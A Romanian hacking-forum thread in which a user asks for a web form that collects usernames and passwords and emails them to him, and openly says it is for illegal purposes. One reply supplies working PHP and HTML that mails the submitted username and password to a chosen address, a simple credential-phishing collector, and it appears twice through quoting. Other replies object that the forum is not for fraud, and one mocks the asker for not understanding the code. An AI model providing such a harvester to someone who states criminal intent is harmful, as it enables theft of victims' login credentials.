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Cer ajutor al unui hacker /coder pro !

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Vreau ajutor pentru ca vreau sa creez un form simplu ex: username ,password and drop down meniu cu submission la mail-ul meu pe un webhost free(detin asa ceva)

Un tutorial dau rep +thx la care ma ajuta pentru ca cele online imi da batai de cap ma baneaza

si vreau sa le folosesc pentru ilegalitatii. ;;)

email submission= adica cand da submit la date le trimite automat la mail-ul meu

Edited by DeCrew
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Asa ceva?

$to = 'mail-ul tau';
$subj = 'Subiect email';
$msg = 'User: '.$_POST['user'].'
Pass: '.$_POST['pass'].'
Optiunea aleasa: '.$_POST['something'];

mail($to, $subj, $msg);

<form method="post">
Username: <input type="text" name="user"><br>
Password: <input type="password" name="pass"><br>
Dropdown?: <select name="something">
<option value="a">Prima optiune</option>
<option value="b">A doua optiune</option>
<option value="c">A treia optiune</option>
<input type="submit" value="Send">

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Asa ceva?

$to = 'mail-ul tau';
$subj = 'Subiect email';
$msg = 'User: '.$_POST['user'].'
Pass: '.$_POST['pass'].'
Optiunea aleasa: '.$_POST['something'];

mail($to, $subj, $msg);

<form method="post">
Username: <input type="text" name="user"><br>
Password: <input type="password" name="pass"><br>
Dropdown?: <select name="something">
<option value="a">Prima optiune</option>
<option value="b">A doua optiune</option>
<option value="c">A treia optiune</option>
<input type="submit" value="Send">

da asa ceva dar sa mearga sa-mi trimita submited data la email-ul meu

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Vreau ajutor pentru ca vreau sa creez un form simplu ex: username ,password and drop down meniu cu submission la mail-ul meu pe un webhost free(detin asa ceva)

Un tutorial dau rep +thx la care ma ajuta pentru ca cele online imi da batai de cap ma baneaza

si vreau sa le folosesc pentru ilegalitatii. ;;)

email submission= adica cand da submit la date le trimite automat la mail-ul meu

O fi forum de hacking, dar aici n-au ce caut? fraudele ?i ac?iunile ilegale.



Profilul mafiotului.

Edited by wildchild
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I simply die when i see this...pardon my english.....man, if you wanna do a scam learn something first! (before you go to jail and you don't even know what for).

I mean you ask something, people hands you that, and you even don't know as much as to modify a variable, function, whatever.

Listen to me....even if you know a lot about programming, protecting yourself, trick technology, is hard do be in that area were you would actually scam someone for money. But you? You are trying to do something without knowing witch "fork" to use...you gonna get caught!

Go to tutorials, spend a year, and if you still feal that you want to this...do it!

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